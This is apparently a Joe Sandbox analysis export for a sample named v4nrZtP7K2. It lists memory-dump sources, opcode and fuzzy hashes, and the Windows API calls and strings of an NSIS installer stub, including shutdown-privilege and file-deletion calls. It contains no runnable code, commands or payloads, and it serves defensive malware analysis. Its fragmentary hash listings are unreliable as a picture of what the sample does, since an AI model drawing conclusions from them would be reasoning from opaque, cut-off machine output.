                                                                                      • Snapshot File: hcaresult_5_2_d0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2a4d4781009bb2b56e4cc652301cf210e10e51a1243dc9fb4d9167fef03e5384
                                                                                      • Instruction ID: 7ecfee463e3e1dc3e42e5cdd69c7a0b6677de3865887ca24f346f7b892d0d805
                                                                                      • Opcode Fuzzy Hash: 2a4d4781009bb2b56e4cc652301cf210e10e51a1243dc9fb4d9167fef03e5384
                                                                                      • Instruction Fuzzy Hash: A7E09A74D04308EFDB44DFB8E5486ACBBF5AB48305F2080BAC809A3320EB309E41CB40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915107000.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_d0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cfcf008ad00edb8954603bd4bb19484615542865df385f6f3a3b62fc002cb201
                                                                                      • Instruction ID: c8304c53151226d54f0c9d3a3f5e6c8c03e030300ef8879c3aee508963828839
                                                                                      • Opcode Fuzzy Hash: cfcf008ad00edb8954603bd4bb19484615542865df385f6f3a3b62fc002cb201
                                                                                      • Instruction Fuzzy Hash: 3BD05B31D2022A57CB00E7A5DC044DFFB38EFD6721B514666D55437140FB702659C6F1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 59fdb1fd0524a9056fe2222fbb990cf5a9ff8cfaf20a68fc9a40334a6f2b9242
                                                                                      • Instruction ID: 1b7781828a96f028179dc150dd0cd577d6798e9e4ff63892ece154d3205bbf0d
                                                                                      • Opcode Fuzzy Hash: 59fdb1fd0524a9056fe2222fbb990cf5a9ff8cfaf20a68fc9a40334a6f2b9242
                                                                                      • Instruction Fuzzy Hash: 32D05E3A10C2804FC7228634A8564E4BF705F1322471552DBD485DBE73D15298498752
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915107000.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_d0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d1325d60ad3ff9fcfd4a329565bed05ee503875272d75d7df15be311a698454c
                                                                                      • Instruction ID: aa59f5ff6b76a190b288dee9bd4c71c3022f99488c08228b3abef934692b7565
                                                                                      • Opcode Fuzzy Hash: d1325d60ad3ff9fcfd4a329565bed05ee503875272d75d7df15be311a698454c
                                                                                      • Instruction Fuzzy Hash: 1AD02B3080D385CFE3828F6099046E9B774AF07201F0440EBC80893292D7340D18D315
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915107000.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_d0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 916a54e3d8711f94695963574215c0ecad56ca53f9491e6194d423e3df362fff
                                                                                      • Instruction ID: 3bbdeee8996b2942c2acae63d55291e395f4097cc6e264aa5c5c76dd3137340a
                                                                                      • Opcode Fuzzy Hash: 916a54e3d8711f94695963574215c0ecad56ca53f9491e6194d423e3df362fff
                                                                                      • Instruction Fuzzy Hash: 27D02B3544C3484FC603DB31FC901C63BA75B81510704D115D0010EABEDF346A8B9B61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915107000.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_d0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b84b5033f8d794f6714055db57c0a34a735d291583726955f512d9ccc0c83504
                                                                                      • Instruction ID: f5cd99f705360ee25175d852e162b2c1b76440b1766698e913224d00db69cd7f
                                                                                      • Opcode Fuzzy Hash: b84b5033f8d794f6714055db57c0a34a735d291583726955f512d9ccc0c83504
                                                                                      • Instruction Fuzzy Hash: 39D05B3524D3456FDB038B10985085ABF52DBC6204B0484FFA448473A2C1259C5D5762
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 429196456528ac56c215e91ace283701f3bebaf0248b1acade11b1dfb5eb5c0d
                                                                                      • Instruction ID: 8729ae4c4cc1bd169de1fec1bf4bfa75c201a67ce60d102015646542402cc29b
                                                                                      • Opcode Fuzzy Hash: 429196456528ac56c215e91ace283701f3bebaf0248b1acade11b1dfb5eb5c0d
                                                                                      • Instruction Fuzzy Hash: 86D0A72514EB901FE71782287C24D9B6FB50ECA52074946EBF048CB0E29AC54E4A8B8F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915107000.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_d0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9e9e8d249a75a47dd0d1db55cd491e6b06392e33f41a1a283dec0a35aa9a7e28
                                                                                      • Instruction ID: 639e02a4331a4665dfd322c9832d7b916b5e6dfcde9bc1ef9def9278953a7c79
                                                                                      • Opcode Fuzzy Hash: 9e9e8d249a75a47dd0d1db55cd491e6b06392e33f41a1a283dec0a35aa9a7e28
                                                                                      • Instruction Fuzzy Hash: 3FD0673AB00008AFCB149F98EC809DDF776FB98221B448116F915A3260C6319966DB50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915107000.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_d0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2aa589238ecfde8f7373d3834e72d4fff93177b3870f7bb72cd24c51cf32da8b
                                                                                      • Instruction ID: 2c6707d9efca74545d83a347b186681662782fcbfd6fbdd92b570801ddfbb26e
                                                                                      • Opcode Fuzzy Hash: 2aa589238ecfde8f7373d3834e72d4fff93177b3870f7bb72cd24c51cf32da8b
                                                                                      • Instruction Fuzzy Hash: 10D0223080430CDFD380DFA0E805BEAB3BCEB43302F0000A9D40823210CB714D00D798
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e7ac4504309eba5a8bee0627808778d0eaea50cfcb1179ebefd94c3dda75645b
                                                                                      • Instruction ID: 1e7c22c34d18472ca679ae54a49de5b5b139e4c102caee90517cb69dc1c5b410
                                                                                      • Opcode Fuzzy Hash: e7ac4504309eba5a8bee0627808778d0eaea50cfcb1179ebefd94c3dda75645b
                                                                                      • Instruction Fuzzy Hash: 8FC0803221971067671CA21CB8545DF53D6DDC9631710DF37F009D31044D509D4749CE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6c2fd5a9d4a9f2757c8e4cc5178c22580eeb4cf8011ebe6d3f1de9e9388fe4ca
                                                                                      • Instruction ID: e112a945200da5897c52b82653a767a56e7122a853e71757ac84531b26578fb2
                                                                                      • Opcode Fuzzy Hash: 6c2fd5a9d4a9f2757c8e4cc5178c22580eeb4cf8011ebe6d3f1de9e9388fe4ca
                                                                                      • Instruction Fuzzy Hash: 4AC01274004E098BE2082F60BC2CB39B2B8B747317FC82910A00C028708BB894148A49
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915107000.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_d0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9ebeeb7c5b5795cb1b2890c7fd454306c7b1fde2594abd9e9392dd31b17f1217
                                                                                      • Instruction ID: c60da0eb2ecc7db47aa7dc665a814508df87adfe07f914334b75e63f323ff685
                                                                                      • Opcode Fuzzy Hash: 9ebeeb7c5b5795cb1b2890c7fd454306c7b1fde2594abd9e9392dd31b17f1217
                                                                                      • Instruction Fuzzy Hash: 79C0803001430C4BD505FB73FD45695376E67C0D20740C514A0050A56EDFB479464FD5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 049f3cb1c5177000c1a820a0db8bdb5dfa8879412838965d8da7a90f022ca74f
                                                                                      • Instruction ID: fd4e5ced847140d9a29cad1b4cb673febebde198a5c043f22bed59f01b3d1b9e
                                                                                      • Opcode Fuzzy Hash: 049f3cb1c5177000c1a820a0db8bdb5dfa8879412838965d8da7a90f022ca74f
                                                                                      • Instruction Fuzzy Hash: 49C08C30268308CFE240AA1DC994B9133ECEF89B14F2018E0F1048B621CB62FC004E0A
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32 ref: 004034C8
                                                                                      • GetVersion.KERNEL32 ref: 004034CE
                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                      • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                      • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                      • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                      • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                        • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                        • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                      • GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                      • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                      • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                      • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                      • lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                      • DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                        • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                      • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                      • ExitProcess.KERNEL32 ref: 0040383A
                                                                                      • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                      • lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                      • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                      • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                      • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                      • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                      • CopyFileW.KERNEL32(00438800,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                      • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                      • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                      • ExitProcess.KERNEL32 ref: 004039E0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                      • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                      • API String ID: 3441113951-334447862
                                                                                      • Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                      • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                      • Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                      • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                      • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                      • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                      • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                      • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                      • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                      • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                      • String ID: $M$N
                                                                                      • API String ID: 1638840714-813528018
                                                                                      • Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                      • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                      • Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                      • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                                                      APIs
                                                                                      • DeleteFileW.KERNEL32(?,?,00437800,76F92EE0,00000000), ref: 00405B23
                                                                                      • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,76F92EE0,00000000), ref: 00405B6B
                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,76F92EE0,00000000), ref: 00405B8E
                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,76F92EE0,00000000), ref: 00405B94
                                                                                      • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,76F92EE0,00000000), ref: 00405BA4
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                      • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                      • String ID: 0WB$\*.*
                                                                                      • API String ID: 2035342205-351390296
                                                                                      • Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                      • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                      • Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                      • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                      • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                      • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                      • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,76F92EE0,00405B1A,?,00437800,76F92EE0), ref: 00406736
                                                                                      • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID: xgB
                                                                                      • API String ID: 2295610775-399326502
                                                                                      • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                      • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                      • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                      • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .5q$BV7
                                                                                      • API String ID: 0-1588251371
                                                                                      • Opcode ID: b82679917982043c81960b04b0e6725d26dcb9ed75ff45bde434cd4f5e9cc2e1
                                                                                      • Instruction ID: 1c61451499e7b453c2ad4a11067d1db8c1bb4727a0a4cb0932062e604542ad2f
                                                                                      • Opcode Fuzzy Hash: b82679917982043c81960b04b0e6725d26dcb9ed75ff45bde434cd4f5e9cc2e1
                                                                                      • Instruction Fuzzy Hash: 42628C74A01228CFDB68DF65C894BDDBBB2BF89301F1081EAD409AB255DB359E81DF50
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2946301304.0000000036940000.00000040.00000800.00020000.00000000.sdmp, Offset: 36940000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_36940000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: _7,
                                                                                      • API String ID: 0-3251406154
                                                                                      • Opcode ID: e70570c027c08f36dd6c202a7ca29ab9fc1e370ad214f85841364b873386f62d
                                                                                      • Instruction ID: bc709cf4b5c4628d249a2ec263afaec62e9914ab4d23f13b000324f46b4081a1
                                                                                      • Opcode Fuzzy Hash: e70570c027c08f36dd6c202a7ca29ab9fc1e370ad214f85841364b873386f62d
                                                                                      • Instruction Fuzzy Hash: 84C1B174E00218CFEB15DFA5D994B9DBBB2BF89300F2081A9D409AB355DB359E85CF50
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: BV7
                                                                                      • API String ID: 0-203228933
                                                                                      • Opcode ID: 419e79016b9a9e7584b5b1a9a26f61bb3a3a5e831b3fcdcba0d3348ce1372d67
                                                                                      • Instruction ID: 230a492a9fd7cdafc3a1b007702aa4c361036f4d19723d1e441a6f05b7757f2e
                                                                                      • Opcode Fuzzy Hash: 419e79016b9a9e7584b5b1a9a26f61bb3a3a5e831b3fcdcba0d3348ce1372d67
                                                                                      • Instruction Fuzzy Hash: 08A19D74A05228CFDB68DF64C854BD9BBB2BF8A301F5085EAD40DA7250DB319E81CF51
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: BV7
                                                                                      • API String ID: 0-203228933
                                                                                      • Opcode ID: c18b2838c8f768ec0b9fcdcca7bcf25e640401c852d6a22eec6014bfd8f59058
                                                                                      • Instruction ID: af237f9e485e06f5a5d0153fd337b25b713f5cabb7a8790c6f15272511f309a3
